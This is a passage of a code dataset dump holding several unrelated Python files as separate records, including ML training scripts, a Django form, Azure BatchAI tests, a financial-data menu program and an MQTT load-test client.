\"debug\" not in opt_C[\"name\"]:\n if rank <= 0:\n tb_logger.add_scalar(k, v, current_step)\n if rank <= 0:\n logger.info(message)\n\n # validation, to produce ker_map_list(fake)\n if current_step % opt_P[\"train\"][\"val_freq\"] == 0 and rank <= 0:\n avg_psnr = 0.0\n idx = 0\n for _, val_data in enumerate(val_loader):\n prepro = util.SRMDPreprocessing(\n opt_P[\"scale\"],\n pca_matrix,\n random=True,\n para_input=opt_P[\"code_length\"],\n kernel=opt_P[\"kernel_size\"],\n noise=False,\n cuda=True,\n sig=opt_P[\"sig\"],\n sig_min=opt_P[\"sig_min\"],\n sig_max=opt_P[\"sig_max\"],\n rate_iso=1.0,\n scaling=3,\n rate_cln=0.2,\n noise_high=0.0,\n )\n LR_img, ker_map = prepro(val_data[\"GT\"])\n single_img_psnr = 0.0\n lr_img = util.tensor2img(LR_img) # save LR image for reference\n\n # valid Predictor\n model_P.feed_data(LR_img, ker_map)\n model_P.test()\n P_visuals = model_P.get_current_visuals()\n est_ker_map = P_visuals[\"Batch_est_ker_map\"]\n\n # Save images for reference\n img_name = os.path.splitext(\n os.path.basename(val_data[\"LQ_path\"][0])\n )[0]\n img_dir = os.path.join(opt_P[\"path\"][\"val_images\"], img_name)\n # img_dir = os.path.join(opt_F['path']['val_images'], str(current_step), '_', str(step))\n util.mkdir(img_dir)\n save_lr_path = os.path.join(img_dir, \"{:s}_LR.png\".format(img_name))\n util.save_img(lr_img, save_lr_path)\n\n for step in range(opt_C[\"step\"]):\n step += 1\n idx += 1\n model_F.feed_data(val_data, LR_img, est_ker_map)\n model_F.test()\n F_visuals = model_F.get_current_visuals()\n SR_img = F_visuals[\"Batch_SR\"]\n # Test SFTMD to produce SR images\n\n model_C.feed_data(SR_img, est_ker_map, ker_map)\n model_C.test()\n C_visuals = model_C.get_current_visuals()\n est_ker_map = C_visuals[\"Batch_est_ker_map\"]\n\n sr_img = util.tensor2img(F_visuals[\"SR\"]) # uint8\n gt_img = util.tensor2img(F_visuals[\"GT\"]) # uint8\n\n save_img_path = os.path.join(\n img_dir,\n \"{:s}_{:d}_{:d}.png\".format(img_name, current_step, step),\n )\n util.save_img(sr_img, save_img_path)\n\n # calculate PSNR\n crop_size = opt_P[\"scale\"]\n gt_img = gt_img / 255.0\n sr_img = sr_img / 255.0\n cropped_sr_img = sr_img[\n crop_size:-crop_size, crop_size:-crop_size, :\n ]\n cropped_gt_img = gt_img[\n crop_size:-crop_size, crop_size:-crop_size, :\n ]\n step_psnr = util.calculate_psnr(\n 
cropped_sr_img * 255, cropped_gt_img * 255\n )\n logger.info(\n \" img:{:s}, psnr: {:.6f}\".format(\n epoch, current_step, step, img_name, step_psnr\n )\n )\n single_img_psnr += step_psnr\n avg_psnr += util.calculate_psnr(\n cropped_sr_img * 255, cropped_gt_img * 255\n )\n\n avg_signle_img_psnr = single_img_psnr / step\n logger.info(\n \" img:{:s}, average psnr: {:.6f}\".format(\n epoch, current_step, step, img_name, avg_signle_img_psnr\n )\n )\n\n avg_psnr = avg_psnr / idx\n\n # log\n logger.info(\"# Validation # PSNR: {:.6f}\".format(avg_psnr))\n logger_val = logging.getLogger(\"val\") # validation logger\n logger_val.info(\n \" psnr: {:.6f}\".format(\n epoch, current_step, step, avg_psnr\n )\n )\n # tensorboard logger\n if opt_P[\"use_tb_logger\"] and \"debug\" not in opt_P[\"name\"]:\n tb_logger.add_scalar(\"psnr\", avg_psnr, current_step)\n\n #### save models and training states\n if current_step % opt_P[\"logger\"][\"save_checkpoint_freq\"] == 0:\n if rank <= 0:\n logger.info(\"Saving models and training states.\")\n model_P.save(current_step)\n model_P.save_training_state(epoch, current_step)\n model_C.save(current_step)\n model_C.save_training_state(epoch, current_step)\n\n if rank <= 0:\n logger.info(\"Saving the final model.\")\n model_P.save(\"latest\")\n model_C.save(\"latest\")\n logger.info(\"End of Predictor and Corrector training.\")\n tb_logger.close()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"codes/config/IKC/train_IKC.py","file_name":"train_IKC.py","file_ext":"py","file_size_in_byte":18445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"522751538","text":"import math\ndef solution(n, stations, w):\n answer = 0\n start = 1\n for station in stations:\n l = station - w - start\n e = w * 2 + 1\n answer += math.ceil(l / e)\n start = station + w + 1\n if start <= n:\n answer += math.ceil((n - start + 1) / e)\n return answer\n\nprint(solution(11, [4, 11], 1))\nprint(solution(16, [9], 2))\n\n# import math\n# def solution(n, stations, w):\n# answer = 0\n# mini = [0] * n\n# for station in stations:\n# mini[station - (w + 1):station + w] = [1]\n# houses = list(''.join(map(str, mini)).split('1'))\n# for house in houses:\n# if house:\n# l = len(house)\n# e = w * 2 + 1\n# if l <= e:\n# answer += 1\n# else:\n# answer += math.ceil(l / e)\n# return answer","sub_path":"Python/Programmers/2018SWC/L3_기지국설치.py","file_name":"L3_기지국설치.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"30244570","text":"import math\ndef isPrime(n):\n if(n < 2):\n return False\n if(n == 2):\n return True\n p = int(math.sqrt(n)) + 1\n for z in range(2, p):\n if(n % z == 0):\n return False\n return True\n\ndef insertAsc(a, i, x):\n j = i\n while(i > 0):\n if not isPrime(a[i - 1]):\n t = a[i - 1]\n if(t > x):\n a[j] = t\n a[i - 1] = x\n j = i - 1\n i -= 1\ndef solution():\n n = int(input())\n a = list(map(int, input().split()))\n if(n == 1):\n print(a[0])\n return\n m = 1\n while(m < n):\n x = a[m]\n if(isPrime(x)):\n m += 1\n continue\n insertAsc(a, m, x)\n m += 1\n for y in range(len(a)):\n if(y == len(a) - 1):\n print(a[y])\n else:\n print(a[y], end = \" \")\n\nsolution()","sub_path":"Sort/bt3.py","file_name":"bt3.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"314851409","text":"# _*_ coding: utf-8 _*_\n__author__ = 'HeYang'\n\nfrom django import 
forms\nfrom django.forms import ValidationError\nfrom django.forms import widgets\n\nfrom managerbook.models import *\n\n\nclass AuthorForm(forms.Form):\n\n name = forms.CharField(\n max_length=32,\n widget=widgets.TextInput(\n attrs={\"type\": \"text\", \"placeholder\": \"作者名\", \"class\": \"form-control\", 'id': \"author_name\", }\n )\n )\n\n address = forms.CharField(\n max_length=32,\n widget=widgets.TextInput(\n attrs={\"type\": \"text\", \"placeholder\": \"居住地\", \"class\": \"form-control\", 'id': \"author_address\", }\n )\n )\n\n phone = forms.IntegerField(\n widget=widgets.TextInput(\n attrs={\"type\": \"text\", \"placeholder\": \"手机号\", \"class\": \"form-control\", 'id': \"author_phone\", }\n )\n )\n\n email = forms.EmailField(\n widget=widgets.TextInput(\n attrs={\"type\": \"text\", \"placeholder\": \"Email\", \"class\": \"form-control\", 'id': \"author_email\", }\n )\n )\n\n authorinfo = forms.CharField(\n widget=widgets.Textarea(\n attrs={\"rows\": 8, \"class\": \"form-control\", \"id\": \"demo-textarea-input-author\", \"placeholder\": \"简介\", }\n )\n )","sub_path":"managerauthor/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"291681563","text":"#Ejercicios en Python - Semana 2\n\n#1.\tLeer un número entero y determinar si es un número terminado en 4\n\nnumero=int(input(\"Ingrese número para evaluar si termina en 4: \")) #Entrada de teclado de número a evaluar\ncadena=str(numero)\nc=len(cadena)\nprint(\"El número ingresado tiene: \"+str(c)+\" dígitos\")\n\nultimo=cadena[c-1]\nprint(\"El último digito del número ingresado es: \"+ultimo)\n\nif ultimo==\"4\":\n print(\"El número: \"+cadena+\" termina en 4\")\nelse:\n print(\"El número: \"+cadena+\" no termina en 4\")\n\n\n#2.\tLeer un número entero y determinar si tiene 3 dígitos.\nnum=int(input(\"Ingrese un número entero de tres dígitos: \"))\ncad=str(num)\nlon=len(cad)\n\nif lon==\"3\":\n print(\"El número ingresado tiene tres dígitos\")\nelse:\n print(\"Intente de nuevo, el número NO tiene tres dígitos\")\n\n","sub_path":"Ejercicios en Python - Semana 2.py","file_name":"Ejercicios en Python - Semana 2.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"591155945","text":"norm_cut = 10000\nfrom modules.histCollection import HistCollection\nfrom modules.histCollection import HistCleaner\nclass DQMPCA(object):\n \"\"\"Class to perform PCA specifically on HistCollection objects\"\"\"\n import numpy as np\n def __init__(self, use_standard_scaler=False, norm_cut=norm_cut, sse_ncomps=None):\n \"\"\"Initialize the DQMPCA\n\n -use_standard_scalar determines whether to use standard scaling\n (zero mean, unit stdev) before feeding into a PCA. This helps\n for some histograms, but hurts for others\n \"\"\"\n if use_standard_scaler:\n self.pca = Pipeline(\n (\"scaler\", StandardScaler()),\n (\"pca\", PCA())\n )\n else:\n self.pca = PCA()\n\n self.use_standard_scaler = use_standard_scaler\n self.norm_cut = norm_cut\n self.sse_ncomps = sse_ncomps\n\n self.__is_fit = False\n\n @property\n def sse_ncomps(self):\n return self.__sse_ncomps\n\n @sse_ncomps.setter\n def sse_ncomps(self, sse):\n if sse is not None and not isinstance(sse, tuple) and not isinstance(sse, list):\n raise Exception(\"illigal sse_ncomps value. 
Should be None or a list/tuple of ints\")\n self.__sse_ncomps = sse\n\n def _check_fit(self):\n if not self.__is_fit:\n raise Exception(\"Must fit the DQMPCA before calling transform\")\n\n def fit(self, hdata):\n if isinstance(hdata, HistCollection):\n self._hist_cleaner = hdata.hist_cleaner\n cleaned = hdata.hdata\n norms = hdata.norms\n \n else:\n self._hist_cleaner = HistCleaner()\n self._hist_cleaner.fit(hdata)\n cleaned = self._hist_cleaner.transform(hdata)\n norms = np.sum(cleaned, axis=1)\n\n cleaned = cleaned[norms>self.norm_cut, :]\n self.pca.fit(cleaned) \n self.__is_fit = True\n\n if self.sse_ncomps is not None:\n self.sse_cuts = {}\n for ncomp in self.sse_ncomps:\n self.sse_cuts[ncomp] = []\n sses = self.sse(cleaned, ncomp)\n for pct in np.arange(1,101):\n self.sse_cuts[ncomp].append(np.percentile(sses, pct))\n \n def transform(self, hdata):\n from modules.histCollection import HistCollection\n from modules.histCollection import HistCleaner\n \"\"\"Transform a set of histograms with the trained PCA\"\"\"\n self._check_fit()\n if isinstance(hdata, HistCollection):\n cleaned = hdata.hdata\n else:\n cleaned = self._hist_cleaner.transform(hdata) \n return self.pca.transform(cleaned)\n \n def inverse_transform(self, xf, n_components=3, restore_bad_bins=False):\n import numpy as np\n self._check_fit()\n xf = np.array(xf)\n trunc = np.zeros((xf.shape[0], self._hist_cleaner.n_good_bins))\n trunc[:,:n_components] = xf[:,:n_components]\n ixf = self.pca.inverse_transform(trunc)\n if not restore_bad_bins:\n return ixf\n else:\n return self._hist_cleaner.restore_bad_bins(ixf)\n\n def sse(self, hdata, n_components=3):\n if isinstance(hdata, HistCollection):\n cleaned = hdata.hdata\n else:\n cleaned = self._hist_cleaner.transform(hdata) \n xf = self.transform(cleaned)\n ixf = self.inverse_transform(xf, n_components=n_components)\n return np.sqrt(np.sum((ixf-cleaned)**2, axis=1))\n \n def score(self, hdata, n_components=3):\n if not hasattr(self, \"sse_cuts\") or n_components not in self.sse_cuts:\n raise Exception(\"must fit first with {0} in sse_ncomps\".format(n_components))\n sse = self.sse(hdata, n_components)\n return np.interp(sse, self.sse_cuts[n_components], np.arange(1,101))\n\n @property\n def explained_variance_ratio(self):\n if self.use_standard_scaler:\n return self.pca.named_steps[\"pca\"].explained_variance_ratio_\n else:\n return self.pca.explained_variance_ratio_\n\n @property\n def mean(self):\n if self.use_standard_scaler:\n return self.pca.named_steps[\"scaler\"].inverse_transform(self.pca.named_steps[\"pca\"].mean_)\n else:\n return self.pca.mean_\n","sub_path":"modules/dqmpca.py","file_name":"dqmpca.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"357283120","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\n########################### READ FILE #################################\r\n\r\nFILE_PATH = \"data5.txt\"\r\nDATA_SIZE = 30*3\r\nLABEL_NUM = 3\r\nbatch_size = 50\r\nCASE = 1500\r\n\r\n\r\ndataSet = np.loadtxt(FILE_PATH, delimiter=' ', dtype=np.float32)\r\nnp.random.shuffle(dataSet)\r\nx_data = dataSet[:, 0:90]\r\ny_data = dataSet[:, [-1]]\r\nprint(x_data)\r\nx_data_ = np.reshape(x_data, (-1, 3, 30))\r\n#print (x_data_)\r\ny_data = y_data.astype(int)\r\n#y_data_ = tf.one_hot(y_data, 3)\r\n#print(y_data_)\r\n\r\nkeep_prob = tf.placeholder(\"float\")\r\nkeep_prob_hidden = tf.placeholder(\"float\")\r\n\r\n###########################\r\n\r\ndef 
weight_variable(shape) :\r\n initial = tf.truncated_normal(shape, stddev=0.1)\r\n return tf.Variable(initial)\r\n\r\ndef bias_variable(shape) :\r\n initial = tf.constant(0.1, shape=shape)\r\n return tf.Variable(initial)\r\n\r\ndef conv2d(x, W) :\r\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\r\n\r\ndef max_pool_2x2(x) :\r\n return tf.nn.max_pool(x, ksize=[1, 2, 1, 1], strides=[1, 2, 1, 1], padding='SAME')\r\n\r\n\r\n#####################################################################################################\r\n\r\n\r\n######################### MODELING ############################\r\n####################### PlaceHolder #######################\r\n\r\nx = tf.placeholder(tf.float32, shape=[None, 3, 30])\r\ny_ = tf.placeholder(tf.float32, shape=[None, LABEL_NUM])\r\n\r\n###################### Variables ########################\r\n\r\nW = tf.Variable(tf.zeros([DATA_SIZE, LABEL_NUM]))\r\nb = tf.Variable(tf.zeros([LABEL_NUM]))\r\n\r\n################## initializer ##################\r\n\r\nsess = tf.Session()\r\n\r\n\r\n########################### First Layer ###############################\r\n\r\nW_conv1 = weight_variable([3, 3, 1, 32])\r\nb_conv1 = bias_variable([32])\r\nx_image = tf.reshape(x, [-1,3,30,1])\r\n\r\n\r\nh_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\r\nh_pool1 = max_pool_2x2(h_conv1)\r\nprint(h_conv1)\r\nprint(h_pool1)\r\n\r\nh_drop1 = tf.nn.dropout(h_pool1, keep_prob)\r\n\r\n########################### Second Layer ###############################\r\n\r\nW_conv2 = weight_variable([3, 3, 32, 64])\r\nb_conv2 = bias_variable([64])\r\n\r\nh_conv2 = tf.nn.relu(conv2d(h_drop1, W_conv2) + b_conv2)\r\nh_pool2 = max_pool_2x2(h_conv2)\r\nprint(h_conv2)\r\nprint(h_pool2)\r\n\r\nh_drop2 = tf.nn.dropout(h_pool2, keep_prob)\r\n\r\n########################### Third Layer ###############################\r\n\r\nW_conv3 = weight_variable([3, 3, 64, 128])\r\nb_conv3 = bias_variable([128])\r\n\r\nh_conv3 = tf.nn.relu(conv2d(h_drop2, W_conv3) + b_conv3)\r\nh_pool3 = max_pool_2x2(h_conv3)\r\nprint(h_conv3)\r\nprint(h_pool3)\r\n\r\nh_drop3 = tf.nn.dropout(h_pool3, keep_prob)\r\n\r\n########################### Full Connected Layer ###############################\r\n\r\nW_fc1 = weight_variable([1*30*128, 256])\r\nb_fc1 = bias_variable([256])\r\n\r\nh_pool3_flat = tf.reshape(h_pool3, [-1, 1*30*128])\r\n\r\nh_fc1 = tf.nn.relu(tf.matmul(h_pool3_flat, W_fc1) + b_fc1)\r\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob_hidden)\r\n\r\n####################### SOFTMAX #############################\r\n\r\nW_fc2 = weight_variable([256, LABEL_NUM])\r\nb_fc2 = bias_variable([LABEL_NUM])\r\ny_conv = tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\r\n\r\n\r\n######################## TRAIN #############################\r\n\r\n\r\ncross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=y_conv, labels=y_))\r\ntrain_step = tf.train.AdamOptimizer(learning_rate=0.000001).minimize(cross_entropy)\r\ncorrect_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\r\n\r\n#x_image = tf.convert_to_tensor(x_data_)\r\n#y_label = tf.convert_to_tensor(y_data)\r\nsaver = tf.train.Saver()\r\n\r\n\r\nwith tf.Session() as sess :\r\n sess.run(tf.global_variables_initializer())\r\n onehot_labels = tf.one_hot(y_data, LABEL_NUM)\r\n onehot_vals = sess.run(onehot_labels)\r\n for j in range(1000):\r\n avg_accuracy_val = 0\r\n batch_count = 0\r\n for i in range(0, CASE, batch_size) :\r\n batch_x = 
x_data_[i:i+batch_size, :]\r\n batch_y = onehot_vals[i:i+batch_size, -1]\r\n cost_, accuracy_val = sess.run([train_step, accuracy], feed_dict={x: batch_x, y_: batch_y, keep_prob: 0.8, keep_prob_hidden:0.5})\r\n avg_accuracy_val += accuracy_val\r\n batch_count += 1\r\n else :\r\n avg_accuracy_val /=batch_count\r\n if(j%100==0) :\r\n save_path = saver.save(sess,'./tensorflow_live.ckpt')\r\n print('Epoch {}. Cost {}. Avg accurach {}'.format(j, cost_, avg_accuracy_val))\r\n\r\nsess.close()\r\n\r\nprint(\"Model saved in file: \", save_path)\r\n\r\n\r\n\r\n\r\n\"\"\" sess.run(train_step, feed_dict={x: batch_x, y_: batch_y, keep_prob: 0.5})\r\n if i%10 == 0 :\r\n train_accuracy = accuracy.eval(session = sess, feed_dict={x:batch_x, y_: batch_y, keep_prob: 1.0})\r\n print (\"step %d, training accuracy %g\" % (i, train_accuracy) ,\r\n train_step.run(session = sess, feed_dict={x: batch_x, y_: batch_y, keep_prob: 0.5}))\r\n\"\"\"","sub_path":"Intent_train_model.py","file_name":"Intent_train_model.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"520575954","text":"import dart_fss as dart\nimport urllib.request as ul\nimport pandas as pd\nfrom tabulate import tabulate\n\nimport sys\nsys.path.append(\"/workspace/Financial_Statement/src/chapter2\")\nsys.path.append(\"/workspace/Financial_Statement/src/common\")\n\nimport UrlGenerator\nimport UrlToInfo\nimport RequestFactors as rf\n\n# API 인증키의 입력 및 인증과, 기업 정보 로딩을 1회만 하기 위해 전역변수 api_key, corp_list를 미리 선언\napi_key = None\ncorp_list = None\ncorp_list_staus = 0\n\n# 프로그램 상태 0\ndef ProgramStart():\n print(\"\"\"\n기업정보 분석 프로그램 with dart를 시작합니다.\n \"\"\")\n user_reply = int(input(\"\"\"\n기능을 선택해주세요(정수 입력).\n1. 박 회계사의 재무제표 분석법(공시정보 로드하기-최초 1회만 로딩) 0. 프로그램 종료하기\n\"\"\"))\n\n if user_reply == 1:\n global api_key\n global corp_list\n global corp_list_staus\n \n if api_key == None:\n api_key = get_API()\n if corp_list_staus == 0:\n print(\"\\n\\nDART에서 기업 정보를 로딩 중입니다. 잠시만 기다려주십시오...\\n\")\n corp_list = update_corp_list(api_key) # API 인증키의 입력 및 인증과 기업 정보 로딩을 1회만 하기 위한 장치, pandans DataFrame 객체이다.\n corp_list_staus = 1\n ParkFS()\n elif user_reply == 0:\n End()\n else:\n End()\n\n\n# 유저입력 01\ndef get_API():\n import AllocateAPI\n api_key = AllocateAPI.api_key(api_key=input('DART 사이트에서 할당받은 API를 입력하세요.(최초 1회만 인증)')) #해당 API로 할당과 인증이 완료.\n return api_key\n\n\ndef update_corp_list(api_key):\n # 모든 상장된 기업 리스트 불러오기\n url = \"https://opendart.fss.or.kr/api/corpCode.xml?crtfc_key=\"+api_key\n corp_list = UrlToInfo.load_company_lists(url)\n return corp_list\n\n\ndef ParkFS():\n print(\"_\"*70+\"\"\"\n초기화면/박 회계사의 재무제표 분석법\n\"\"\")\n user_reply = int(input(\"\"\"\n2. 재무상태표로 기업의 재무 상태 파악하기\n3. 손익계산서로 경영 성과 엿보기\n4. 지배기업과 종속기업 그리고 재무제표\n5. 기업의 현금흐름 파악하기\n6. 주석사항에서 알짝 정보 얻기\n7. 재무제표 분석과 주요 재무비율\n0. 이전으로\n\"\"\"))\n\n if user_reply == 2:\n chapter2()\n elif user_reply == 0:\n ProgramStart()\n\n\n# 유저입력 012\ndef chapter2():\n import chapter2\n chapter2.start()\n\n\n# 유저입력 -1\ndef End():\n print(\"프로그램을 종료합니다.\")\n","sub_path":"src/ProgramMain.py","file_name":"ProgramMain.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"648465859","text":"from django.urls import include, path\n\nfrom . 
import views\n\nurlpatterns = [\n path('', views.BoqList, name='BoqList'),\n path('findboq', views.findBoq, name='findBoq'),\n path('addboq', views.AddBoq, name='AddBoq'),\n path('findboqdetail', views.findBoqDetail, name='findBoqDetail'),\n path('boqdetail/', views.boqdetailList, name='boqdetailList'),\n path('addboqdetail/', views.addboqdetail, name='addboqdetail'),\n]\n","sub_path":"construction/BOQ/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"32950924","text":"# coding: utf-8\n# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n# pylint: disable=line-too-long\nimport pytest\nfrom azure.mgmt.batchai import BatchAIManagementClient, models\nfrom devtools_testutils import AzureMgmtTestCase, ResourceGroupPreparer\nfrom msrestazure.azure_exceptions import CloudError\n\nfrom helpers import Helpers\n\n\nclass ExperimentTestCase(AzureMgmtTestCase):\n def setUp(self):\n super(ExperimentTestCase, self).setUp()\n self.client = Helpers.create_batchai_client(self) # type: BatchAIManagementClient\n\n @ResourceGroupPreparer(location=Helpers.LOCATION)\n def test_creation_and_deletion(self, resource_group, location):\n name = 'testee'\n workspace_name = 'workspace'\n self.client.workspaces.create(resource_group.name, workspace_name, location).result()\n experiment = self.client.experiments.create(resource_group.name, workspace_name, name).result()\n self.assertEqual(experiment.name, name)\n experiment_id = experiment.id\n # Check can get experiment info\n experiment = self.client.experiments.get(resource_group.name, workspace_name, name)\n self.assertEqual(experiment.id, experiment_id)\n # Check experiment found in list results\n experiments = self.client.experiments.list_by_workspace(resource_group.name, workspace_name)\n self.assertTrue(experiment_id in [e.id for e in experiments])\n # Delete\n self.client.experiments.delete(resource_group.name, workspace_name, name).result()\n # Check the experiment is actually deleted\n self.assertRaises(CloudError, lambda: self.client.experiments.get(resource_group.name, workspace_name, name))\n\n @ResourceGroupPreparer(location=Helpers.LOCATION)\n def test_experiments_isolation(self, resource_group, location):\n self.client.workspaces.create(resource_group.name, 'first', location).result()\n self.client.workspaces.create(resource_group.name, 'second', location).result()\n # Create a cluster, two experiments and a job in each experiment\n for workspace in ['first', 'second']:\n cluster = self.client.clusters.create(\n resource_group.name,\n workspace,\n 'cluster',\n parameters=models.ClusterCreateParameters(\n vm_size='STANDARD_D1',\n scale_settings=models.ScaleSettings(\n manual=models.ManualScaleSettings(target_node_count=0)),\n user_account_settings=models.UserAccountSettings(\n admin_user_name=Helpers.ADMIN_USER_NAME,\n admin_user_password=Helpers.ADMIN_USER_PASSWORD\n ),\n vm_priority='lowpriority'\n )).result()\n for experiment in ['exp1', 'exp2']:\n self.client.experiments.create(resource_group.name, workspace, experiment).result()\n self.client.jobs.create(\n resource_group.name,\n workspace,\n experiment,\n 'job',\n parameters=models.JobCreateParameters(\n 
cluster=models.ResourceId(id=cluster.id),\n                        node_count=1,\n                        std_out_err_path_prefix='$AZ_BATCHAI_MOUNT_ROOT',\n                        custom_toolkit_settings=models.CustomToolkitSettings(\n                            command_line='true'\n                        )\n                    )\n                ).result()\n        # Delete exp1 in the first workspace\n        self.client.experiments.delete(resource_group.name, 'first', 'exp1').result()\n        # Ensure the experiment was actually deleted\n        self.assertRaises(CloudError, lambda: self.client.experiments.get(resource_group.name, 'first', 'exp1'))\n        for workspace in ['first', 'second']:\n            # Ensure the clusters are not affected\n            self.client.clusters.get(resource_group.name, workspace, 'cluster')\n            # Ensure the other experiments are not affected\n            for experiment in ['exp1', 'exp2']:\n                if workspace == 'first' and experiment == 'exp1':\n                    continue\n                self.client.experiments.get(resource_group.name, workspace, experiment)\n                job = self.client.jobs.get(resource_group.name, workspace, experiment, 'job')\n                # And check the job are not terminated\n                self.assertEqual(job.execution_state, models.ExecutionState.queued)\n","sub_path":"azure-mgmt-batchai/tests/test_mgmt_batchai_experiments.py","file_name":"test_mgmt_batchai_experiments.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"608843623","text":"import sys\nfrom Bio import Phylo\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nsys.path.insert(0, \"ancient_erv_analysis\")\nfrom compute_q_traits import calculate_gc_content\nfrom gp_models import NeutralModel\n\n\ndef plot_nll(segment):\n    erv_data = pd.read_csv(f\"../ancient_erv_analysis/data/3_q_traits/2_simulated_sequences/{segment}/traits.csv\",\n                           index_col=0).T\n    erv_tree = Phylo.read(f\"../ancient_erv_analysis/metadata/segment_trees/paml_inferred/{segment}.nwk\", \"newick\")\n\n    with open(f\"../ancient_erv_analysis/data/2_simulated_sequences/{segment}/alignment.root\", \"r\") as algn_f:\n        root_seq = str(algn_f.read()).strip()\n\n    true_z0 = calculate_gc_content(root_seq)\n\n    nm = NeutralModel(erv_data['gc_content'], erv_tree,\n                      fixed_params={'u': 1.34, 'Zeq': 0.44, 'sigma_eq': 0.2464 / len(root_seq)})\n    nm.fit()\n\n    z0 = np.linspace(0., 1., 100)\n    L = 800\n\n    psi = (1. / L) * (0.44 + z0 - 2. * z0 * 0.44)\n\n    nll = []\n\n    for i in range(100):\n        nm.z0 = z0[i]\n        nm.psi = psi[i]\n        nll.append(nm.nll())\n\n    plt.plot(z0, nll)\n    plt.axvline(true_z0, c='red', ls='--', label='True Z0')\n    plt.xlabel(\"Z0\")\n    plt.ylabel(\"NLL\")\n    plt.title(f\"GC Content - {segment}\")\n    plt.legend()\n    plt.show()\n\n\nplot_nll('segment_320_722')\n","sub_path":"gp_models/plot_nll.py","file_name":"plot_nll.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"571356884","text":"\"\"\"\nPATTERN RULES\n{\n    'SUB': '#',\n    'TAGS': {TAGNAME': 'TOPIC'|INDEX for TOPIC.split(\"/\")|any fixed value except integer or 'TOPIC', ...},\n    'MEASUREMENT': INDEX for TOPIC.split(\"/\")|any fixed value,\n    'TYPE': bool|int|float|str|any fixed value\n}\n\"\"\"\n\nPATTERNS = [\n    {'SUB': 'foobar/oben/lounge/leinwand/action',\n     'TAGS': {'TOPIC': 'TOPIC', 'ROOM': -3},\n     'MEASUREMENT': \"leinwand\", 'TYPE': str\n     },\n    {'SUB': 'foobar/+/tuer',\n     'TAGS': {'location': -2},\n     'MEASUREMENT': \"door_status\", 'TYPE': int\n     },\n    {'SUB': '/hq/og/baellebad/sensoren/temperatur',\n     'TAGS': {'location': -3},\n     'MEASUREMENT': \"temperature\", 'TYPE': float\n     },\n    {'SUB': '$SYS/#',\n     'TAGS': {'TOPIC': 'TOPIC', 'format': -1},\n     'MEASUREMENT': \"mqtt_statistic\", 'TYPE': float\n     }\n]\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"55551263","text":"\"\"\"\n    Handles Paho MQTT-Client operations like publish/subscription, connection,\n    loop function.\n\"\"\"\nimport logging\nimport time\nimport json\nimport paho.mqtt.client as mqtt\n\nfrom src.utils import Utils\nfrom src.config import CONFIG\nfrom src.ejbca.cert_client import CertClient\n\n\nREQUEST_TYPE = 'mqtt'\nMESSAGE_TYPE_CONNECT = 'connect'\nMESSAGE_TYPE_DISCONNECT = 'disconnect'\nMESSAGE_TYPE_PUB = 'publish'\nMESSAGE_TYPE_SUB = 'subscribe'\nMESSAGE_TYPE_RECV_MESSAGE = 'recv_message'\nMESSAGE_TYPE_RENEW = 'renew'\nMESSAGE_TYPE_REVOKE = 'revoke'\n\n\nclass LocustError(Exception):\n    \"\"\"\n    Locust error exception.\n    \"\"\"\n\nclass ConnectError(Exception):\n    \"\"\"\n    Connection error exception.\n    \"\"\"\n\nclass DisconnectError(Exception):\n    \"\"\"\n    Disconnection error exception.\n    \"\"\"\n\nclass CertRevogationError(Exception):\n    \"\"\"\n    Certificate revogation error exception.\n    \"\"\"\n\n\nclass MQTTClient:\n    \"\"\"\n    MQTT client to load test Dojot MQTT IoTAgent.\n    \"\"\"\n    def __init__(self,\n                 device_id: str,\n                 run_id: str,\n                 should_revoke: bool,\n                 should_renew: bool):\n        \"\"\"\n        MQTT client constructor. 
